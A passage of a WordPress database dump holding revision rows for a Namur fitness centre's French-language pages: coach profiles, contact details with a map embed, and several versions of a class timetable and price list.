alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-07-10 15:47:02', '2013-07-10 15:47:02', '', 20, 'http://www.crosstrainingcenter.be/20-revision-36/', 0, 'revision', '', 0),
(337, 1, '2013-07-11 07:03:58', '2013-07-11 07:03:58', '<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Prise de RDV :</h1>\r\nLes prises de RDV pour les séances de\r\nTeam Training, Duo Training, Personnal\r\nTraining ou Coaching nutritionnel se\r\nfont exclusivement par téléphone.\r\n\r\n0485 / 92 . 02 . 12\r\n<h1>&nbsp;</h1>\r\n<h1>Adresse :</h1>\r\nBowling et Squash de Namur\r\nChaussée de Perwez 251\r\n<em id=\"__mceDel\"> 5002 Namur\r\n<a href=\"mailto:info@crosstrainingcenter.be\">info@crosstrainingcenter.be</a></em></td>\r\n<td style=\"border: 0px; width: 50%;\">\r\n<h1>Plan d\'accès :</h1>\r\n<iframe src=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;output=embed\" height=\"300\" width=\"300\" frameborder=\"0\" marginwidth=\"0\" marginheight=\"0\" scrolling=\"no\"></iframe>\r\n<small><a style=\"color: #0000ff; text-align: left;\" href=\"https://maps.google.be/maps?q=Chauss%C3%A9e+de+Perwez+251+5002+namur&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002&amp;gl=be&amp;t=m&amp;ll=50.4846,4.849863&amp;spn=0.016384,0.025749&amp;z=14&amp;source=embed\">Agrandir le plan</a></small></td>\r\n</tr>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h1>Laissez-nous un message :</h1>\r\n[contact-form-7 id=\"257\" title=\"Contact form 1\"]</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Contact', '', 'inherit', 'open', 'open', '', '9-revision-v1', '', '', '2013-07-11 07:03:58', '2013-07-11 07:03:58', '', 9, 'http://www.crosstrainingcenter.be/9-revision-20/', 0, 'revision', '', 0),
(339, 1, '2013-07-25 16:36:46', '2013-07-25 16:36:46', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2>&nbsp;</h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2>&nbsp;</h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2>&nbsp;</h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2>&nbsp;</h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-25 16:36:46', '2013-07-25 16:36:46', '', 11, 'http://www.crosstrainingcenter.be/11-revision-114/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(344, 1, '2013-08-23 08:46:17', '2013-08-23 08:46:17', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-08-23 08:46:17', '2013-08-23 08:46:17', '', 11, 'http://www.crosstrainingcenter.be/11-revision-115/', 0, 'revision', '', 0),
(346, 1, '2013-10-05 08:39:04', '2013-10-05 08:39:04', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcellule\">18h<br>TRX</td>\r\n<td class=\"tcellule\">17h30<br>CARDIO</td>\r\n<td class=\"tcellule\">18h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">17h30<br>GLFE</td>\r\n<td class=\"tcellule\">17h30<br>TRX</td>\r\n<td class=\"tcellule\">17h30<br>TRX</td>\r\n<td class=\"tcellule\">11h<br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\">18h30<br>GLFE</td>\r\n<td class=\"tcellule\">18h15<br>TRX</td>\r\n<td class=\"tcellule\">18h30<br>CARDIO</td>\r\n<td class=\"tcellule\">18h15<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">18h15<br>GLFE</td>\r\n<td class=\"tcellule\">11h30<br>GLFE</td>\r\n<td class=\"tcellule\">11h30<br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcellule\">19h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">19h<br>GLFE</td>\r\n<td class=\"tcellule\">19h<br>TRX</td>\r\n<td class=\"tcellule\">19h<br>CARDIO</td>\r\n<td class=\"tcellule\">19h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">12h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">12h<br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\">19h45<br>CARDIO</td>\r\n<td class=\"tcellule\">19h30<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">19h45<br>GLFE</td>\r\n<td class=\"tcellule\">19h15<br>TRX</td>\r\n<td class=\"tcellule\">19h45<br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h00</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">11h30</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitreg\">12h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td style=\"width: 50%;\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<span style=\"text-decoration: underline;\"><strong>TRX :</strong></span> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<span style=\"text-decoration: underline;\"><strong>Circuit GLFE :</strong></span> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issus de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !\r\n<h2></h2>\r\n<h2>Duo Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h2></h2>\r\n<h2>Personal Training :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h2></h2>\r\n<h2>Coaching nutritionnel :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h2></h2>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-10-05 08:39:04', '2013-10-05 08:39:04', '', 11, 'http://www.crosstrainingcenter.be/11-revision-117/', 0, 'revision', '', 0),
(345, 1, '2013-10-05 08:37:45', '2013-10-05 08:37:45', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n<br>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcellule\">18h<br>TRX</td>\r\n<td class=\"tcellule\">17h30<br>CARDIO</td>\r\n<td class=\"tcellule\">18h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">17h30<br>GLFE</td>\r\n<td class=\"tcellule\">17h30<br>TRX</td>\r\n<td class=\"tcellule\">17h30<br>TRX</td>\r\n<td class=\"tcellule\">11h<br>GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\">18h30<br>GLFE</td>\r\n<td class=\"tcellule\">18h15<br>TRX</td>\r\n<td class=\"tcellule\">18h30<br>CARDIO</td>\r\n<td class=\"tcellule\">18h15<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">18h15<br>GLFE</td>\r\n<td class=\"tcellule\">11h30<br>GLFE</td>\r\n<td class=\"tcellule\">11h30<br>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcellule\">19h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">19h<br>GLFE</td>\r\n<td class=\"tcellule\">19h<br>TRX</td>\r\n<td class=\"tcellule\">19h<br>CARDIO</td>\r\n<td class=\"tcellule\">19h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">12h<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">12h<br>CARDIO</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"tcellule\">19h45<br>CARDIO</td>\r\n<td class=\"tcellule\">19h30<br>RIP-KETTLE</td>\r\n<td class=\"tcellule\">19h45<br>GLFE</td>\r\n<td class=\"tcellule\">19h15<br>TRX</td>\r\n<td class=\"tcellule\">19h45<br>CARDIO</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n<td class=\"tcellule\">&nbsp;</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<br>\r\n\r\n\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td colspan=\"2\">\r\n<h6>En semaine :</h6>\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n<td class=\"ttitreh\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">17h30</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">18h15</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttitreg\">19h00</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitreg\">19h45</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n<td class=\"tcellule\">RIP-KETTLE</td>\r\n<td class=\"tcellule\">GLFE</td>\r\n<td class=\"tcellule\">TRX</td>\r\n<td class=\"tcellule\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 50%;\">\r\n<h6>Le week-end :</h6>\r\n<table style=\"width: 90%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\"></td>\r\n<td class=\"ttitreh\">SAMEDI</td>\r\n<td class=\"ttitreh\">DIMANCHE</td>\r\n</tr>\r\n<tr>\r\n<td 